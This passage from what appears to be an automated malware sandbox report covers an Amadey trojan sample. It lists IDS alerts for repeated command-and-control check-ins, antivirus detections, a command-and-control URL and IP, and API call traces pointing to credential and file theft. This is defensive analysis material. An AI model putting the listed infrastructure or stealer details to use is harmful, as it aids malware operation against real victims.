                        Source Port:49831
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349919802027700 06/02/22-01:55:13.807547
                        SID:2027700
                        Source Port:49919
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349825802027700 06/02/22-01:54:27.778293
                        SID:2027700
                        Source Port:49825
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349791802027700 06/02/22-01:54:01.965478
                        SID:2027700
                        Source Port:49791
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349785802027700 06/02/22-01:53:59.351850
                        SID:2027700
                        Source Port:49785
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349914802027700 06/02/22-01:55:11.848128
                        SID:2027700
                        Source Port:49914
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349874802027700 06/02/22-01:54:56.482566
                        SID:2027700
                        Source Port:49874
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349866802027700 06/02/22-01:54:52.699550
                        SID:2027700
                        Source Port:49866
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349819802027700 06/02/22-01:54:20.991169
                        SID:2027700
                        Source Port:49819
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349903802027700 06/02/22-01:55:07.519813
                        SID:2027700
                        Source Port:49903
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349880802027700 06/02/22-01:54:58.245914
                        SID:2027700
                        Source Port:49880
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349891802027700 06/02/22-01:55:01.891788
                        SID:2027700
                        Source Port:49891
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349849802027700 06/02/22-01:54:41.432432
                        SID:2027700
                        Source Port:49849
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349796802027700 06/02/22-01:54:04.522416
                        SID:2027700
                        Source Port:49796
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349814802027700 06/02/22-01:54:17.528472
                        SID:2027700
                        Source Port:49814
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349885802027700 06/02/22-01:54:59.420913
                        SID:2027700
                        Source Port:49885
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349855802027700 06/02/22-01:54:48.113243
                        SID:2027700
                        Source Port:49855
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349808802027700 06/02/22-01:54:14.080650
                        SID:2027700
                        Source Port:49808
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349850802027700 06/02/22-01:54:42.196474
                        SID:2027700
                        Source Port:49850
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://sigint.ws/f8dfksdj3/index.phpAvira URL Cloud: Label: malware
                        Source: http://sigint.ws/f8dfksdj3/index.php2Avira URL Cloud: Label: malware
                        Source: http://sigint.ws/f8dfksdj3/index.phpD%Avira URL Cloud: Label: malware
                        Source: sigint.ws/f8dfksdj3/index.phpAvira URL Cloud: Label: malware
                        Source: 13.2.0XzeMRyE1e.exe.400000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "sigint.ws/f8dfksdj3/index.php", "Version": "3.10"}
                        Source: 0XzeMRyE1e.exeVirustotal: Detection: 36%Perma Link
                        Source: 0XzeMRyE1e.exeMetadefender: Detection: 14%Perma Link
                        Source: 0XzeMRyE1e.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exeMetadefender: Detection: 20%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeMetadefender: Detection: 20%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeMetadefender: Detection: 14%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file_22613[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeJoe Sandbox ML: detected
                        Source: 17.3.file_22613.exe.d5d0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040B5AD CreateMutexA,GetLastError,Sleep,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,CreateDirectoryA,SetCurrentDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,CreateDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,CloseHandle,SetCurrentDirectoryA,SHFileOperation,17_2_0040B5AD
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_004032BE __EH_prolog3,RegOpenKeyExA,GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,_strcpy_s,GetProcessHeap,HeapFree,_strcpy_s,RegEnumValueA,17_2_004032BE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040F4BC _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat,17_2_0040F4BC
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040F64C CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,17_2_0040F64C
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040F6A5 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,17_2_0040F6A5
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040F8E3 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,17_2_0040F8E3
                        Source: 0XzeMRyE1e.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: unknownHTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49759 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49766 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49767 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49893 version: TLS 1.2
                        Source: 0XzeMRyE1e.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe, 0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000000.297328127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446415275.0000000003832000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.446348077.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.428197655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000002.430278226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000015.00000000.418537482.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: C:\Tex\Ras sav\Quevah\Bopo nan.pdb source: file_22613.exe, file_22613.exe, 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000011.00000000.330984448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000002.508562908.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000012.00000000.360616448.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000000.380119657.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613.exe, 00000014.00000002.508484154.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, file_22613[1].exe.13.dr, file_22613.exe.13.dr
                        Source: Binary string: C:\Users\Administrator\Desktop\PRIVATESTUB - powershell\ClassLibrary1\obj\Release\ClassLibrary1.pdb source: 0XzeMRyE1e.exe, 00000000.00000002.308828876.00000000094E0000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000000.00000002.301026710.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.450200051.0000000008C00000.00000004.08000000.00040000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Administrator\Desktop\attachments\obj\Debug\Zonli.pdb source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe.7.dr
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_004099F2 _memset,_memset,_memset,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,17_2_004099F2
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0041E2F2 FindFirstFileExW,13_2_0041E2F2
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00408117 __EH_prolog3_GS,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcatW,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,17_2_00408117
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00411133 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_00411133
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040950A wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,PathMatchSpecA,FindNextFileA,FindClose,17_2_0040950A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041778D __EH_prolog3_GS,FindFirstFileW,FindNextFileW,17_2_0041778D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0040895E __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,17_2_0040895E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00412AE1 __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,FindNextFileA,FindClose,17_2_00412AE1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00408B6B __EH_prolog3_GS,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,FindNextFileA,FindClose,17_2_00408B6B
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00412D6E __EH_prolog3_GS,wsprintfA,FindFirstFileA,GetFileAttributesA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindNextFileA,FindClose,17_2_00412D6E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00411E67 __EH_prolog3_GS,__wgetenv,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,17_2_00411E67
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_00410EAE wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_00410EAE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]17_2_00401000
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax17_2_00401000

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49764 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2838063 ETPRO TROJAN Amadey CnC Server Payload Response (exe) 80.66.64.103:80 -> 192.168.2.4:49764
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49784 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49785 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49786 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49787 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49788 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49789 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49790 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49791 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49792 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49793 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49794 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49795 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49796 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49797 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49798 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49799 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49800 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49801 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49802 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49803 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49804 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49805 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49806 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49807 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49808 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49809 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49810 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49811 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49812 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49813 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49814 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49815 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49816 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49817 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49818 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49820 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49821 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49823 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49824 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49825 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49826 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49828 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49829 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49830 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49832 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49834 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49836 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49837 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49840 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49843 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49845 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49847 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49849 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49852 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49854 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49858 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49859 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49860 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49862 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49865 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49867 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49869 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49875 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49876 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49878 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49880 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49889 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49892 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 80.66.64.103:80
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49898 -> 80.66.64.103:80
